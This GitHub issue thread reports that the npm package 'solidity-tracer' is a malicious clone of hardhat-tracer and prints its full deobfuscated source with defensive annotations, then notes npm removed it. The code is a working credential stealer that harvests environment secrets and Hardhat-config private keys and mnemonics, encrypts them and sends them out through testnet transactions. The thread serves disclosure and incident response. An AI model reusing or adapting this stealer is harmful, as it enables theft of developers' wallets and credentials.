malware clone of hardhat-tracer
CedarMist commented
The following package is a clone of hardhat-tracer, but it contains malware that scrapes for private keys:
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
This submits the encrypted data to BSC & matic testnets:
See:
- https://testnet.bscscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274
- https://mumbai.polygonscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274
The deobfuscated code is:
// Dependency guard: prints an upgrade message and exits with status 1 when
// "@nomicfoundation/ethereumjs-vm" cannot be loaded. The message identifies the
// plugin as "hardhat-tracer" rather than by the name this package was published
// under, which is consistent with the report that it is a copy of hardhat-tracer.
try {
require("@nomicfoundation/ethereumjs-vm");
} catch {
console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n");
process.exit(0x1);
}
import './chai';
import './extend';
import './tasks';
export * from './types';
export * from './wrapper';
// Modules used by the functions below: `crypto` for the encryption step,
// `hardhat/config` for the environment hook, and `@ethereumjs/tx`,
// `@ethereumjs/common` and `web3` for building, signing and broadcasting a
// transaction.
// NOTE(review): whether the genuine plugin imports any of these is not visible
// here; compare against the upstream source before treating a single import as
// an indicator on its own.
const crypto = require("crypto");
const hardhatConfig = require('hardhat/config');
const ethereumjs = require("@ethereumjs/tx");
const common = require("@ethereumjs/common");
import { Web3, HttpProvider } from 'web3';
// Substrings tested against environment variable names in secretsFromEnv().
// The short entries ("KEY", "PK", "API", "ETH", "_PATH") match far more than
// wallet secrets, for example any *_API_KEY or *_PATH variable.
const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"];
/**
 * Collects every environment variable whose name contains one of ENV_PATTERNS.
 *
 * The name is upper-cased before the substring test, so the match is
 * case-insensitive. Each hit is returned as a "NAME=value" string.
 *
 * Incident-response note: on a host where this package was loaded, every
 * variable whose name contains one of these substrings (wallet keys, API
 * tokens, deploy credentials) should be treated as disclosed and rotated.
 *
 * @returns {string[]} "NAME=value" entries for the matching variables.
 */
function secretsFromEnv() {
return Object.keys(process.env).filter(_0x51d8e8 => {
// Keep the variable as soon as any pattern occurs anywhere in its name.
for (const _0x4cc5f3 of ENV_PATTERNS) {
if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) {
return true;
}
}
return false;
// Pair each surviving name with its current value.
}).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]);
}
/**
 * Returns the value unchanged when JSON.stringify accepts it; otherwise
 * returns a "<label>: <error>" string in its place.
 *
 * The JSON.stringify result is discarded: the call only tests whether
 * serialisation throws. Presumably this keeps one unserialisable entry from
 * breaking the later serialisation of the whole list.
 *
 * @param {*} _0x4c7ddd - Candidate value read from the Hardhat config.
 * @param {string} _0xacc2d9 - Label naming the config field it came from.
 * @returns {*} The original value, or the label followed by the error text.
 */
function checkSecret(_0x4c7ddd, _0xacc2d9) {
try {
JSON.stringify(_0x4c7ddd);
return _0x4c7ddd;
} catch (_0x361686) {
return _0xacc2d9 + ": " + _0x361686;
}
}
/**
 * Extracts signing material from every entry of `config.networks`.
 *
 * For each network the first match wins, in this order: `privateKey`,
 * `mnemonic`, then `accounts` (every element when it is an array, or its
 * `privateKey` / `mnemonic` property when it is a plain object). Networks with
 * none of these yield null and are dropped; the per-network arrays are then
 * flattened into one list.
 *
 * Incident-response note: any key or mnemonic configured for any network in
 * the affected project's Hardhat config is in scope, not only the network
 * that was in use when the plugin ran.
 *
 * @param {object} _0x9cc15f - Config object; only its `networks` property is read.
 * @returns {Array} Flat list of extracted values (or error strings from checkSecret).
 */
function secretsFromConfig(_0x9cc15f) {
// A missing `networks` property is treated as an empty object.
return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => {
if (!!_0x28194b.privateKey) {
return [checkSecret(_0x28194b.privateKey, "privateKey")];
}
if (!!_0x28194b.mnemonic) {
return [checkSecret(_0x28194b.mnemonic, "mnemonic")];
}
if (!!_0x28194b.accounts) {
// Array form: every element is taken, labelled with its index.
if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) {
return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']'));
}
// Plain-object form: only `privateKey` or `mnemonic` is taken.
if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) {
if (!!_0x28194b.accounts.privateKey) {
return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')];
}
if (!!_0x28194b.accounts.mnemonic) {
return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")];
}
}
}
// Nothing recognised (including `accounts` values that are neither an
// Array nor a plain Object, such as a string).
return null;
}).filter(_0x32f721 => _0x32f721 != null).flat();
}
/**
 * Serialises the collected list and encrypts it so that only the holder of the
 * private key matching the embedded RSA public key can read it.
 *
 * Scheme, as written: a fresh random 32-byte key and 16-byte IV encrypt the
 * JSON text with AES-256-CBC; the key and the IV are then each encrypted
 * separately with the embedded RSA public key. The random key and IV are never
 * stored or returned in the clear.
 *
 * Output layout: RSA(key) || RSA(iv) || AES ciphertext.
 * NOTE(review): the embedded key looks like a 2048-bit modulus, which would
 * make each RSA block 256 bytes and the fixed prefix 512 bytes. Confirm before
 * relying on that length when parsing captured payloads.
 *
 * Incident-response note: the published payload cannot be decrypted by the
 * victim, so it does not show which values were taken; scope the response from
 * what the collectors would have matched on the affected host.
 *
 * @param {Array} _0x4f59ef - Values gathered from the environment and the config.
 * @returns {Buffer} Wrapped key, wrapped IV and ciphertext, concatenated.
 */
function encryptSecrets(_0x4f59ef) {
let _0x1df4a4;
try {
_0x1df4a4 = JSON.stringify(_0x4f59ef);
} catch (_0x33f25f) {
// Serialisation failure is reported inside the payload instead of thrown.
_0x1df4a4 = "final: " + _0x33f25f;
}
// 0x20 = 32-byte AES key, 0x10 = 16-byte IV, both generated per call.
const _0x31a8b0 = crypto.randomBytes(0x20);
const _0x282dd4 = crypto.randomBytes(0x10);
const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4);
let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex");
_0x5c300f += _0x49f6ff.final('hex');
// Hard-coded public key; the same PEM text is a static string to search for
// in installed copies of the package.
const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----");
// Key and IV are wrapped in two separate RSA operations.
const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0);
const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4);
return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]);
}
/**
 * Publishes the payload as the `data` field of a zero-value transaction sent
 * through an HTTP JSON-RPC endpoint.
 *
 * The function looks up the sender's transaction count to use as the nonce,
 * builds the transaction with a fixed gas limit (0x19f0a0 = 1,700,000) and gas
 * price (0x826299e00 = 35,000,000,000), signs it locally with the supplied key
 * and submits the serialised result.
 *
 * Detection note: the observable network activity is HTTPS JSON-RPC traffic
 * from the process that loaded the plugin to the endpoint passed in
 * `_0x46aefb`, which is not something a tracing plugin needs in order to work.
 *
 * @param {Buffer} _0xd0d988 - Encrypted payload placed in the transaction data.
 * @param {string} _0x46aefb - RPC endpoint URL.
 * @param {number} _0x18d187 - Chain id.
 * @param {string} _0x38c1f1 - Hex-encoded private key used to sign.
 * @param {string} _0x44908f - Sender address (used for the nonce lookup and `from`).
 * @param {string} _0x3fc84f - Recipient address.
 * @returns {Promise<string>} Hash of the submitted transaction.
 */
async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) {
const _0x119a6c = new HttpProvider(_0x46aefb);
const _0x443b17 = new Web3(_0x119a6c);
const _0x4b0523 = new Buffer(_0x38c1f1, 'hex');
// First network round-trip: current transaction count of the sender.
const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f);
const _0x4192ba = new ethereumjs.Transaction({
'gasLimit': _0x443b17.utils.toHex(0x19f0a0),
'gasPrice': _0x443b17.utils.toHex(0x826299e00),
'from': _0x44908f,
'to': _0x3fc84f,
'nonce': _0x443b17.utils.toHex(_0x9d637e),
// No value is transferred; the transaction exists only to carry `data`.
'value': _0x443b17.utils.toHex('0'),
'data': _0xd0d988,
'chainId': _0x18d187
}, {
'common': common.Common.custom({
'chainId': _0x18d187
})
});
const _0xe02a79 = _0x4192ba.sign(_0x4b0523);
// Second network round-trip: broadcast of the signed transaction.
const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex"));
return _0x403ee4.transactionHash;
}
/**
 * Submits the payload to the first endpoint and falls back to the second if
 * that attempt throws.
 *
 * Both attempts use the same hard-coded signing key, sender address and
 * recipient address; only the RPC URL and chain id differ (0x61 = 97 for the
 * first, 0x13881 = 80001 for the second). The sender address is the one shown
 * in the block-explorer links in the report. Because the signing key is
 * embedded in the package, the sender address and the two RPC hostnames are
 * stable indicators for log and egress searches.
 *
 * Failures are never surfaced: the first error is discarded, and the second is
 * turned into a returned string.
 *
 * @param {Buffer} _0x39d958 - Encrypted payload from encryptSecrets().
 * @returns {Promise<string>} Transaction hash, or "store mumbai err: ..." text.
 */
async function storeSecrets(_0x39d958) {
try {
return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
} catch (_0x1bd08d) {
// The first failure is ignored; retry on the second network.
try {
return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
} catch (_0x40cdaf) {
return "store mumbai err: " + _0x40cdaf;
}
}
}
// Entry point of the added behaviour: registers a callback through Hardhat's
// extendEnvironment hook. The callback gathers values from the environment and
// from the config it is handed, encrypts them and publishes them.
// NOTE(review): extendEnvironment callbacks are expected to run whenever the
// Hardhat runtime environment is created, so any Hardhat command in a project
// that loads this plugin would trigger collection. Confirm against the Hardhat
// version in use.
// Nothing is logged and the storeSecrets() result is discarded, so a run leaves
// no console output; collection errors are appended to the payload as strings.
hardhatConfig.extendEnvironment(async _0x185fb5 => {
const _0x199acd = [];
try {
_0x199acd.push(...secretsFromEnv());
} catch (_0x4a1233) {
_0x199acd.push("env err: " + _0x4a1233);
}
try {
_0x199acd.push(...secretsFromConfig(_0x185fb5.config));
} catch (_0x2ae4bc) {
_0x199acd.push("config err: " + _0x2ae4bc);
}
const _0x3745e5 = encryptSecrets(_0x199acd);
await storeSecrets(_0x3745e5);
});
zemse commented
Thanks for taking the effort! It appears that the package has been taken down by the npm team. https://www.npmjs.com/package/solidity-tracer